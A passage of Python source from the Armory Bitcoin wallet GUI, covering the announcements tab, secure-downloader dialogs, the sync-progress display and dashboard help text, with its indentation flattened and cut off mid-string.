QMessageBox.warning(self, tr('Update'), tr("""
Announcements are now up to date!"""), QMessageBox.Ok)
self.lblLastUpdated = QRichLabel('', doWrap=False)
self.btnCheckForUpdates = QPushButton(tr('Check for Updates'))
self.connect(self.btnCheckForUpdates, SIGNAL(CLICKED), checkUpd)
frmLastUpdate = makeHorizFrame(['Stretch', \
self.lblLastUpdated, \
self.btnCheckForUpdates, \
'Stretch'])
self.icoArmorySWVersion = QLabel('')
self.lblArmorySWVersion = QRichLabel(tr("""
No version information is available"""), doWrap=False)
self.icoSatoshiSWVersion = QLabel('')
self.lblSatoshiSWVersion = QRichLabel('', doWrap=False)
self.btnSecureDLArmory = QPushButton(tr('Secure Downloader'))
self.btnSecureDLSatoshi = QPushButton(tr('Secure Downloader'))
self.btnSecureDLArmory.setVisible(False)
self.btnSecureDLSatoshi.setVisible(False)
self.connect(self.btnSecureDLArmory, SIGNAL(CLICKED), self.openDLArmory)
self.connect(self.btnSecureDLSatoshi, SIGNAL(CLICKED), self.openDLSatoshi)
frmVersions = QFrame()
layoutVersions = QGridLayout()
layoutVersions.addWidget(self.icoArmorySWVersion, 0,0)
layoutVersions.addWidget(self.lblArmorySWVersion, 0,1)
layoutVersions.addWidget(self.btnSecureDLArmory, 0,2)
layoutVersions.addWidget(self.icoSatoshiSWVersion, 1,0)
layoutVersions.addWidget(self.lblSatoshiSWVersion, 1,1)
layoutVersions.addWidget(self.btnSecureDLSatoshi, 1,2)
layoutVersions.setColumnStretch(0,0)
layoutVersions.setColumnStretch(1,1)
layoutVersions.setColumnStretch(2,0)
frmVersions.setLayout(layoutVersions)
frmVersions.setFrameStyle(STYLE_RAISED)
lblVerHeader = QRichLabel(tr("""<font size=4><b>
Software Version Updates:</b></font>"""), doWrap=False, \
hAlign=Qt.AlignHCenter)
lblTableHeader = QRichLabel(tr("""<font size=4><b>
All Available Notifications:</b></font>"""), doWrap=False, \
hAlign=Qt.AlignHCenter)
# We need to generate popups when a widget is clicked, and be able
# change that particular widget's target, when the table is updated.
# Create one of these DlgGen objects for each of the 10 rows, simply
# update it's nid and notifyMap when the table is updated
class DlgGen():
def setParams(self, parent, nid, notifyMap):
self.parent = parent
self.nid = nid
self.notifyMap = notifyMap
def __call__(self):
return DlgNotificationWithDNAA(self.parent, self.parent, \
self.nid, self.notifyMap, False).exec_()
self.announceTableWidgets = \
[[QLabel(''), QRichLabel(''), QLabelButton('+'), DlgGen()] \
for i in range(10)]
layoutTable = QGridLayout()
for i in range(10):
for j in range(3):
layoutTable.addWidget(self.announceTableWidgets[i][j], i,j)
self.connect(self.announceTableWidgets[i][2], SIGNAL(CLICKED), \
self.announceTableWidgets[i][3])
layoutTable.setColumnStretch(0,0)
layoutTable.setColumnStretch(1,1)
layoutTable.setColumnStretch(2,0)
frmTable = QFrame()
frmTable.setLayout(layoutTable)
frmTable.setFrameStyle(STYLE_SUNKEN)
self.updateAnnounceTable()
frmEverything = makeVertFrame( [ self.lblAlertStr,
frmLastUpdate,
'Space(30)',
lblTableHeader,
frmTable,
'Space(30)',
lblVerHeader,
frmVersions,
'Stretch'])
frmEverything.setMinimumWidth(300)
frmEverything.setMaximumWidth(800)
frmFinal = makeHorizFrame(['Stretch', frmEverything, 'Stretch'])
self.announceScrollArea = QScrollArea()
self.announceScrollArea.setWidgetResizable(True)
self.announceScrollArea.setWidget(frmFinal)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.announceScrollArea)
self.tabAnnounce.setLayout(scrollLayout)
self.announceIsSetup = True
#############################################################################
def openDownloaderAll(self):
dl,cl = self.getDownloaderData()
if not dl is None and not cl is None:
UpgradeDownloaderDialog(self, self, None, dl, cl).exec_()
#############################################################################
def openDLArmory(self):
dl,cl = self.getDownloaderData()
if not dl is None and not cl is None:
UpgradeDownloaderDialog(self, self, 'Armory', dl, cl).exec_()
#############################################################################
def openDLSatoshi(self):
dl,cl = self.getDownloaderData()
if not dl is None and not cl is None:
UpgradeDownloaderDialog(self, self, 'Satoshi', dl, cl).exec_()
#############################################################################
def getDownloaderData(self):
dl = self.announceFetcher.getAnnounceFile('downloads')
cl = self.announceFetcher.getAnnounceFile('changelog')
dlObj = downloadLinkParser().parseDownloadList(dl)
clObj = changelogParser().parseChangelogText(cl)
if dlObj is None or clObj is None:
QMessageBox.warning(self, tr('No Data'), tr("""
The secure downloader has not received any download
data to display. Either the <font color="%s"><b>Armory
Technologies, Inc.</b></font> announcement feeder is
down, or this computer cannot access the server.""") % \
htmlColor('TextGreen'), QMessageBox.Ok)
return None,None
lastUpdate = self.announceFetcher.getLastSuccessfulFetchTime()
sinceLastUpd = RightNow() - lastUpdate
if lastUpdate < RightNow()-1*WEEK:
QMessageBox.warning(self, tr('Old Data'), tr("""
The last update retrieved from the <font color="%(color)s"><b>Armory
Technologies, Inc.</b></font> announcement feeder was <b>%(time)s</b>
ago. The following downloads may not be the latest
available.""") % { 'color' : htmlColor("TextGreen"), \
'time' : secondsToHumanTime(sinceLastUpd)}, QMessageBox.Ok)
dl = self.announceFetcher.getAnnounceFile('downloads')
cl = self.announceFetcher.getAnnounceFile('changelog')
return dl,cl
#############################################################################
def updateAnnounceTab(self, *args):
if not self.announceIsSetup:
return
iconArmory = ':/armory_icon_32x32.png'
iconSatoshi = ':/bitcoinlogo.png'
iconInfoFile = ':/MsgBox_info48.png'
iconGoodFile = ':/MsgBox_good48.png'
iconWarnFile = ':/MsgBox_warning48.png'
iconCritFile = ':/MsgBox_critical24.png'
lastUpdate = self.announceFetcher.getLastSuccessfulFetchTime()
noAnnounce = (lastUpdate == 0)
if noAnnounce:
self.lblLastUpdated.setText(tr("No announcement data was found!"))
self.btnSecureDLArmory.setVisible(False)
self.icoArmorySWVersion.setVisible(True)
self.lblArmorySWVersion.setText(tr(""" You are running Armory
version %s""") % getVersionString(BTCARMORY_VERSION))
else:
updTimeStr = unixTimeToFormatStr(lastUpdate)
self.lblLastUpdated.setText(tr("<u>Last Updated</u>: %s") % updTimeStr)
verStrToInt = lambda s: getVersionInt(readVersionString(s))
# Notify of Armory updates
self.icoArmorySWVersion.setPixmap(QPixmap(iconArmory).scaled(24,24))
self.icoSatoshiSWVersion.setPixmap(QPixmap(iconSatoshi).scaled(24,24))
try:
armCurrent = verStrToInt(self.armoryVersions[0])
armLatest = verStrToInt(self.armoryVersions[1])
if armCurrent >= armLatest:
dispIcon = QPixmap(iconArmory).scaled(24,24)
self.icoArmorySWVersion.setPixmap(dispIcon)
self.btnSecureDLArmory.setVisible(False)
self.lblArmorySWVersion.setText(tr(
"You are using the latest version of Armory (%s)"
% self.armoryVersions[0]))
else:
dispIcon = QPixmap(iconWarnFile).scaled(24,24)
self.icoArmorySWVersion.setPixmap(dispIcon)
self.btnSecureDLArmory.setVisible(True)
self.lblArmorySWVersion.setText(tr("""
<b>There is a newer version of Armory available!</b>"""))
self.btnSecureDLArmory.setVisible(True)
self.icoArmorySWVersion.setVisible(True)
except:
self.btnSecureDLArmory.setVisible(False)
self.lblArmorySWVersion.setText(tr(""" You are running Armory
version %s""") % getVersionString(BTCARMORY_VERSION))
try:
satCurrStr,satLastStr = self.satoshiVersions
satCurrent = verStrToInt(satCurrStr) if satCurrStr else 0
satLatest = verStrToInt(satLastStr) if satLastStr else 0
# Show CoreBTC updates
if satCurrent and satLatest:
if satCurrent >= satLatest:
dispIcon = QPixmap(iconGoodFile).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(False)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr(""" You are using
the latest version of core Bitcoin (%s)""") % satCurrStr)
else:
dispIcon = QPixmap(iconWarnFile).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(True)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr("""
<b>There is a newer version of the core Bitcoin software
available!</b>"""))
elif satCurrent:
# satLatest is not available
dispIcon = QPixmap(iconGoodFile).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(False)
self.icoSatoshiSWVersion.setPixmap(None)
self.lblSatoshiSWVersion.setText(tr(""" You are using
core Bitcoin version %s""") % satCurrStr)
elif satLatest:
# only satLatest is avail (maybe offline)
dispIcon = QPixmap(iconSatoshi).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(True)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr("""Core Bitcoin version
%s is available.""") % satLastStr)
else:
# only satLatest is avail (maybe offline)
dispIcon = QPixmap(iconSatoshi).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(False)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr("""No version information
is available for core Bitcoin""") )
#self.btnSecureDLSatoshi.setVisible(False)
#if self.satoshiVersions[0]:
#self.lblSatoshiSWVersion.setText(tr(""" You are running
#core Bitcoin software version %s""") % self.satoshiVersions[0])
#else:
#self.lblSatoshiSWVersion.setText(tr("""No information is
#available for the core Bitcoin software"""))
except:
LOGEXCEPT('Failed to process satoshi versions')
self.updateAnnounceTable()
#############################################################################
def updateAnnounceTable(self):
# Default: Make everything non-visible except first row, middle column
for i in range(10):
for j in range(3):
self.announceTableWidgets[i][j].setVisible(i==0 and j==1)
if len(self.almostFullNotificationList)==0:
self.announceTableWidgets[0][1].setText(tr("""
There are no announcements or alerts to display"""))
return
alertsForSorting = []
for nid,nmap in self.almostFullNotificationList.iteritems():
alertsForSorting.append([nid, int(nmap['PRIORITY'])])
sortedAlerts = sorted(alertsForSorting, key=lambda a: -a[1])[:10]
i = 0
for nid,priority in sortedAlerts:
if priority>=4096:
pixm = QPixmap(':/MsgBox_critical64.png')
elif priority>=3072:
pixm = QPixmap(':/MsgBox_warning48.png')
elif priority>=2048:
pixm = QPixmap(':/MsgBox_info48.png')
else:
pixm = QPixmap(':/MsgBox_info48.png')
shortDescr = self.almostFullNotificationList[nid]['SHORTDESCR']
if priority>=4096:
shortDescr = '<font color="%s">' + shortDescr + '</font>'
shortDescr = shortDescr % htmlColor('TextWarn')
self.announceTableWidgets[i][0].setPixmap(pixm.scaled(24,24))
self.announceTableWidgets[i][1].setText(shortDescr)
self.announceTableWidgets[i][2].setVisible(True)
self.announceTableWidgets[i][3].setParams(self, nid, \
self.almostFullNotificationList[nid])
for j in range(3):
self.announceTableWidgets[i][j].setVisible(True)
i += 1
#############################################################################
def explicitCheckAnnouncements(self, waitTime=3):
self.announceFetcher.fetchRightNow(waitTime)
self.processAnnounceData()
self.updateAnnounceTab()
#############################################################################
def closeExistingBitcoin(self):
for proc in psutil.process_iter():
try:
if proc.name().lower() in ['bitcoind.exe','bitcoin-qt.exe',\
'bitcoind','bitcoin-qt']:
killProcess(proc.pid)
time.sleep(2)
return
# If the block above rasises access denied or anything else just skip it
except:
pass
# If got here, never found it
QMessageBox.warning(self, 'Not Found', \
'Attempted to kill the running Bitcoin-Qt/bitcoind instance, '
'but it was not found. ', QMessageBox.Ok)
#############################################################################
def getPercentageFinished(self, maxblk, lastblk):
curr = EstimateCumulativeBlockchainSize(lastblk)
maxb = EstimateCumulativeBlockchainSize(maxblk)
return float(curr)/float(maxb)
#############################################################################
def showShuttingDownMessage(self):
self.isShuttingDown = True
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
self.frmDashSubExit.setVisible(True)
self.frmDashMode.setVisible(False)
self.lblDashDescr1.setVisible(False)
self.frmDashMidButtons.setVisible(False)
self.lblDashDescr2.setVisible(False)
self.lblDashDescr2.setVisible(False)
#############################################################################
def updateSyncProgress(self):
if self.isShuttingDown:
return
if TheTDM.getTDMState()=='Downloading':
dlSpeed = TheTDM.getLastStats('downRate')
timeEst = TheTDM.getLastStats('timeEst')
fracDone = TheTDM.getLastStats('fracDone')
numSeeds = TheTDM.getLastStats('numSeeds')
numPeers = TheTDM.getLastStats('numPeers')
self.barProgressTorrent.setVisible(True)
self.lblDashModeTorrent.setVisible(True)
self.lblTimeLeftTorrent.setVisible(True)
self.lblTorrentStats.setVisible(True)
self.barProgressTorrent.setFormat('%p%')
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.barProgressSync.setValue(0)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.barProgressBuild.setValue(0)
self.lblTimeLeftBuild.setVisible(True)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.barProgressScan.setValue(0)
self.lblTimeLeftScan.setVisible(True)
self.barProgressScan.setFormat('')
if not numSeeds:
self.barProgressTorrent.setValue(0)
self.lblTimeLeftTorrent.setText('')
self.lblTorrentStats.setText('')
self.lblDashModeTorrent.setText(tr('Initializing Torrent Engine'), \
size=4, bold=True, color='Foreground')
self.lblTorrentStats.setVisible(False)
else:
self.lblDashModeTorrent.setText(tr('Downloading via Armory CDN'), \
size=4, bold=True, color='Foreground')
if fracDone:
self.barProgressTorrent.setValue(int(99.9*fracDone))
if timeEst:
self.lblTimeLeftTorrent.setText(secondsToHumanTime(timeEst))
self.lblTorrentStats.setText(tr("""
Bootstrap Torrent: %(sec)s/sec from %(peers)d peers""") % \
{'sec' : bytesToHumanSize(dlSpeed), 'peers' : numSeeds+numPeers})
self.lblTorrentStats.setVisible(True)
elif TheBDM.getState()==BDM_SCANNING:
self.barProgressTorrent.setVisible(TheTDM.isStarted())
self.lblDashModeTorrent.setVisible(TheTDM.isStarted())
self.barProgressTorrent.setValue(100)
self.lblTimeLeftTorrent.setVisible(False)
self.lblTorrentStats.setVisible(False)
self.barProgressTorrent.setFormat('')
self.lblDashModeSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setValue(100)
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(True)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
phase,pct,tleft,numericProgress = TheBDM.predictLoadTime()
if phase==Cpp.BDMPhase_DBHeaders:
self.lblDashModeBuild.setText( tr('Loading Database Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( 'Scan Transaction History', \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_OrganizingChain:
self.lblDashModeBuild.setText( tr('Organizing Blockchain'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
elif phase==Cpp.BDMPhase_BlockHeaders:
self.lblDashModeBuild.setText( tr('Reading New Block Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_BlockData:
self.lblDashModeBuild.setText( tr('Building Databases'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_Rescan:
self.lblDashModeBuild.setText( tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( tr('Scanning Transaction History'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.barProgressScan.setFormat('%p%')
tleft15 = (int(tleft-1)/15 + 1)*15
if tleft < 2:
tstring = ''
pvalue = pct*100
else:
tstring = secondsToHumanTime(tleft15)
pvalue = pct*100
if phase==BDMPhase_BlockHeaders or phase==BDMPhase_BlockData or phase==BDMPhase_DBHeaders:
self.lblTimeLeftBuild.setText(tstring)
self.barProgressBuild.setValue(pvalue)
elif phase==BDMPhase_Rescan:
self.lblTimeLeftScan.setText(tstring)
self.barProgressScan.setValue(pvalue)
elif TheSDM.getSDMState() in ['BitcoindInitializing','BitcoindSynchronizing']:
self.barProgressTorrent.setVisible(TheTDM.isStarted())
self.lblDashModeTorrent.setVisible(TheTDM.isStarted())
self.barProgressTorrent.setValue(100)
self.lblTimeLeftTorrent.setVisible(False)
self.lblTorrentStats.setVisible(False)
self.barProgressTorrent.setFormat('')
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('%p%')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setValue(0)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setValue(0)
self.barProgressScan.setFormat('')
ssdm = TheSDM.getSDMState()
lastBlkNum = self.getSettingOrSetDefault('LastBlkRecv', 0)
lastBlkTime = self.getSettingOrSetDefault('LastBlkRecvTime', 0)
# Get data from SDM if it has it
info = TheSDM.getTopBlockInfo()
if len(info['tophash'])>0:
lastBlkNum = info['numblks']
lastBlkTime = info['toptime']
# Use a reference point if we are starting from scratch
refBlock = max(290746, lastBlkNum)
refTime = max(1394922889, lastBlkTime)
# Ten min/block is pretty accurate, even from genesis (about 1% slow)
# And it gets better as we sync past the reference block above
self.approxMaxBlock = refBlock + int((RightNow() - refTime) / (10*MINUTE))
self.approxBlkLeft = self.approxMaxBlock - lastBlkNum
self.approxPctSoFar = self.getPercentageFinished(self.approxMaxBlock, \
lastBlkNum)
self.initSyncCircBuff.append([RightNow(), self.approxPctSoFar])
if len(self.initSyncCircBuff)>30:
# There's always a couple wacky measurements up front, start at 10
t0,p0 = self.initSyncCircBuff[10]
t1,p1 = self.initSyncCircBuff[-1]
dt,dp = t1-t0, p1-p0
if dt>600:
self.initSyncCircBuff = self.initSyncCircBuff[1:]
if dp>0 and dt>0:
dpPerSec = dp / dt
if lastBlkNum < 200000:
dpPerSec = dpPerSec / 2
timeRemain = (1 - self.approxPctSoFar) / dpPerSec
#timeRemain = min(timeRemain, 8*HOUR)
else:
timeRemain = None
else:
timeRemain = None
intPct = int(100*self.approxPctSoFar)
strPct = '%d%%' % intPct
self.barProgressSync.setFormat('%p%')
if ssdm == 'BitcoindReady':
return (0,0,0.99) # because it's probably not completely done...
self.lblTimeLeftSync.setText(tr('Almost Done...'))
self.barProgressSync.setValue(99)
elif ssdm == 'BitcoindSynchronizing':
sdmPercent = int(99.9*self.approxPctSoFar)
if self.approxBlkLeft < 10000:
if self.approxBlkLeft < 200:
self.lblTimeLeftSync.setText(tr('%(n)d blocks') % { 'n':self.approxBlkLeft})
else:
# If we're within 10k blocks, estimate based on blkspersec
if info['blkspersec'] > 0:
timeleft = int(self.approxBlkLeft/info['blkspersec'])
self.lblTimeLeftSync.setText(secondsToHumanTime(timeleft))
else:
# If we're more than 10k blocks behind...
if timeRemain:
timeRemain = min(24*HOUR, timeRemain)
self.lblTimeLeftSync.setText(secondsToHumanTime(timeRemain))
else:
self.lblTimeLeftSync.setText('')
elif ssdm == 'BitcoindInitializing':
sdmPercent = 0
self.barProgressSync.setFormat('')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
else:
LOGERROR('Should not predict sync info in non init/sync SDM state')
return ('UNKNOWN','UNKNOWN', 'UNKNOWN')
self.barProgressSync.setValue(sdmPercent)
else:
LOGWARN('Called updateSyncProgress while not sync\'ing')
#############################################################################
def GetDashFunctionalityText(self, func):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
if func.lower() == 'scanning':
return tr( \
'The following functionality is available while scanning in offline mode:'
'<ul>'
'<li>Create new wallets</li>'
'<li>Generate receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign transactions created from an online system</li>'
'<li>Sign messages</li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, even if you are offline. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline, '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'offline':
return tr( \
'The following functionality is available in offline mode:'
'<ul>'
'<li>Create, import or recover wallets</li>'
'<li>Generate new receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Import private keys to wallets</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign messages</li>'
'<li><b>Sign transactions created from an online system</b></li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, regardless of whether you are online. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline, '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'online':
return tr( \
'<ul>'
'<li>Create, import or recover Armory wallets</li>'
'<li>Generate new addresses to receive coins</li>'
'<li>Send bitcoins to other people</li>'
'<li>Create one-time backups of your wallets (in printed or digital form)</li>'
'<li>Click on "bitcoin:" links in your web browser '
'(not supported on all operating systems)</li>'
'<li>Import private keys to wallets</li>'
'<li>Monitor payments to watching-only wallets and create '
'unsigned transactions</li>'
'<li>Sign messages</li>'
'<li><b>Create transactions with watching-only wallets, '
'to be signed by an offline wallets</b></li>'
'</ul>')
#############################################################################
def GetDashStateText(self, mgmtMode, state):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
# A few states don't care which mgmtMode you are in...
if state == 'NewUserInfo':
return tr("""
For more information about Armory, and even Bitcoin itself, you should
visit the <a href="https://bitcoinarmory.com/faq/">frequently
asked questions page</a>. If
you are experiencing problems using this software, please visit the
<a href="https://bitcoinarmory.com/troubleshooting/">Armory
troubleshooting webpage</a>. It will be updated frequently with
solutions to common problems.
<br><br>
<b><u>IMPORTANT:</u></b> Make a backup of your wallet(s)! Paper
backups protect you <i>forever</i> against forgotten passwords,
hard-drive failure, and make it easy for your family to recover
your funds if something terrible happens to you. <i>Each wallet
only needs to be backed up once, ever!</i> Without it, you are at
risk of losing all of your Bitcoins! For more information,
visit the <a href="https://bitcoinarmory.com/armory-backups-are-forever/">Armory
Backups page</a>.
<br><br>
To learn about improving your security through the use of offline
wallets, visit the
<a href="https://bitcoinarmory.com/using-our-wallet">Armory
Quick Start Guide</a>, and the
<a href="https://bitcoinarmory.com/using-our-wallet/#offlinewallet">Offline
Wallet Tutorial</a>.<br><br> """)
elif state == 'OnlineFull1':
return tr( \
'<p><b>You now have access to all the features Armory has to offer!</b><br>'
'To see your balances and transaction history, please click '
'on the "Transactions" tab above this text. <br>'
'Here\'s some things you can do with Armory Bitcoin Client:'
'<br>')
elif state == 'OnlineFull2':
return ( \
(tr('If you experience any performance issues with Armory, '
'please confirm that Bitcoin-Qt is running and <i>fully '
'synchronized with the Bitcoin network</i>. You will see '
'a green checkmark in the bottom right corner of the '
'Bitcoin-Qt window if it is synchronized. If not, it is '
'recommended you close Armory and restart it only when you '
'see that checkmark.'
'<br><br>') if not self.doAutoBitcoind else '') + tr(
'<b>Please backup your wallets!</b> Armory wallets are '
'"deterministic", meaning they only need to be backed up '
'one time (unless you have imported external addresses/keys). '
'Make a backup and keep it in a safe place! All funds from '
'Armory-generated addresses will always be recoverable with '
'a paper backup, any time in the future. Use the "Backup '
'Individual Keys" option for each wallet to backup imported '
'keys.</p>'))
elif state == 'OnlineNeedSweep':
return tr( \
'Armory is currently online, but you have requested a sweep operation '
'on one or more private keys. This requires searching the global '
'transaction history for the available balance of the keys to be '
'swept. '
'<br><br>'
'Press the button to start the blockchain scan, which '
'will also put Armory into offline mode for a few minutes '
'until the scan operation is complete')
elif state == 'OnlineDirty':
return tr( \
'<b>Wallet balances may '
'be incorrect until the rescan operation is performed!</b>'
'<br><br>'
'Armory is currently online, but addresses/keys have been added '
'without rescanning the blockchain. You may continue using '
'Armory in online mode, but any transactions associated with the '
'new addresses will not appear in the ledger. '
'<br><br>'
'Pressing the button above will put Armory into offline mode '
'for a few minutes until the scan operation is complete.')
elif state == 'OfflineNoSatoshiNoInternet':
return tr( \
'There is no connection to the internet, and there is no other '
'Bitcoin software running. Most likely '
'you are here because this is a system dedicated '
'to manage offline wallets! '
'<br><br>'
'<b>If you expected Armory to be in online mode</b>, '
'please verify your internet connection is active, '
'then restart Armory. If you think the lack of internet '
'connection is in error (such as if you are using Tor), '
'then you can restart Armory with the "--skip-online-check" '
'option, or change it in the Armory settings.'
'<br><br>'
'If you do not have Bitcoin-Qt installed, you can '
'download it from <a href="http://www.bitcoin.org">'
'http://www.bitcoin.org</a>.')
# Branch the available display text based on which Satoshi-Management
# mode Armory is using. It probably wasn't necessary to branch the
# the code like this, but it helped me organize the seemingly-endless
# number of dashboard screens I need
if mgmtMode.lower()=='user':
if state == 'OfflineButOnlinePossible':
return tr( \
'You are currently in offline mode, but can '
'switch to online mode by pressing the button above. However, '
'it is not recommended that you switch until '
'Bitcoin-Qt/bitcoind is fully synchronized with the bitcoin network. '
'You will see a green checkmark in the bottom-right corner of '
'the Bitcoin-Qt window when it is finished.'
'<br><br>'
'Switching to online mode will give you access '
'to more Armory functionality, including sending and receiving '
'bitcoins and viewing the balances and transaction histories '
'of each of your wallets.<br><br>')
elif state == 'OfflineNoSatoshi':
bitconf = os.path.join(BTC_HOME_DIR, 'bitcoin.conf')
return tr( \
'You are currently in offline mode because '
'Bitcoin-Qt is not running. To switch to online '
'mode, start Bitcoin-Qt and let it synchronize with the network '
'-- you will see a green checkmark in the bottom-right corner when '
'it is complete. If Bitcoin-Qt is already running and you believe '
'the lack of connection is an error (especially if using proxies), '
'please see <a href="'
'https://bitcointalk.org/index.php?topic=155717.msg1719077#msg1719077">'
'this link</a> for options.'
'<br><br>'
'<b>If you prefer to have Armory do this for you</b>, '
'then please check "Let Armory run '
'Bitcoin-Qt in the background" under "File"->"Settings."'
'<br><br>'
'If you are new to Armory and/or Bitcoin-Qt, '
'please visit the Armory '
'webpage for more information. Start at '
'<a href="https://bitcoinarmory.com/armory-and-bitcoin-qt">'
'Why Armory needs Bitcoin-Qt</a> or go straight to our <a '
'href="https://bitcoinarmory.com/faq/">'
'frequently asked questions</a> page for more general information. '
'If you already know what you\'re doing and simply need '
'to fetch the latest version of Bitcoin-Qt, you can download it from '
'<a href="http://www.bitcoin.org">http://www.bitcoin.org</a>.')
elif state == 'OfflineNoInternet':
return tr( \
'You are currently in offline mode because '
'Armory could not detect an internet connection. '
'If you think this is in error, then '
'restart Armory using the " --skip-online-check" option, '
'or adjust the Armory settings. Then restart Armory.'
'<br><br>'
'If this is intended to be an offline computer, note '
'that it is not necessary to have Bitcoin-Qt or bitcoind '
'running.' )
elif state == 'OfflineNoBlkFiles':
return tr( \
'You are currently in offline mode because '
'Armory could not find the blockchain files produced '
'by Bitcoin-Qt. Do you run Bitcoin-Qt (or bitcoind) '
'from a non-standard directory? Armory expects to '
'find the blkXXXX.dat files in <br><br>%s<br><br> '
'If you know where they are located, please restart '
'Armory using the " --satoshi-datadir=[path]" '
'to notify Armory where to find them.') % BLKFILE_DIR
elif state == 'Disconnected':
return tr( \
'Armory was previously online, but the connection to Bitcoin-Qt/'
'bitcoind was interrupted. You will not be able to send bitcoins '
'or confirm receipt of bitcoins until the connection is '
'reestablished. <br><br>Please check that Bitcoin-Qt is open '
'and synchronized with the network. Armory will <i>try to '
'reconnect</i> automatically when the connection is available '
'again. If Bitcoin-Qt is available again, and reconnection does '
'not happen, please restart Armory.<br><br>')
elif state == 'ScanNoWallets':
return tr( \
'Please wait while the global transaction history is scanned. '
'Armory will go into online mode automatically, as soon as '
'the scan is complete.')
elif state == 'ScanWithWallets':
return tr( \
'Armory is scanning the global transaction history to retrieve '
'information about your wallets. The "Transactions" tab will '
'be updated with wallet balance and history as soon as the scan is '
'complete. You may manage your wallets while you wait.<br><br>')
else:
LOGERROR('Unrecognized dashboard state: Mgmt:%s, State:%s', \
mgmtMode, state)
return ''
elif mgmtMode.lower()=='auto':
if state == 'OfflineBitcoindRunning':
return tr( \
'It appears you are already running Bitcoin software '
'(Bitcoin-Qt or bitcoind). '
'Unlike previous versions of Armory, you should <u>not</u> run '
'this software yourself -- Armory '
'will run it in the background for you. Either close the '
'Bitcoin application or adjust your settings. If you change '
'your settings, then please restart Armory.')
if state == 'OfflineNeedBitcoinInst':
return tr( \
'<b>Only one more step to getting online with Armory!</b> You '
'must install the Bitcoin software from www.bitcoin.org in order '
'for Armory to communicate with the Bitcoin network. If the '
'Bitcoin software is already installed and/or you would prefer '
'to manage it yourself, please adjust your settings and '
'restart Armory.')
if state == 'InitializingLongTime':
return tr("""
<b>To maximize your security, the Bitcoin engine is downloading
and verifying the global transaction ledger. <u>This will take
several hours, but only needs to be done once</u>!</b> It is
usually best to leave it running over night for this
initialization process. Subsequent loads will only take a few
minutes.
<br><br>
<b>Please Note:</b> Between Armory and the underlying Bitcoin
engine, you need to have 40-50 GB of spare disk space available
to hold the global transaction history.
<br><br>
While you wait, you can manage your wallets. Make new wallets,
make digital or paper backups, create Bitcoin addresses to receive
payments,
sign messages, and/or import private keys. You will always
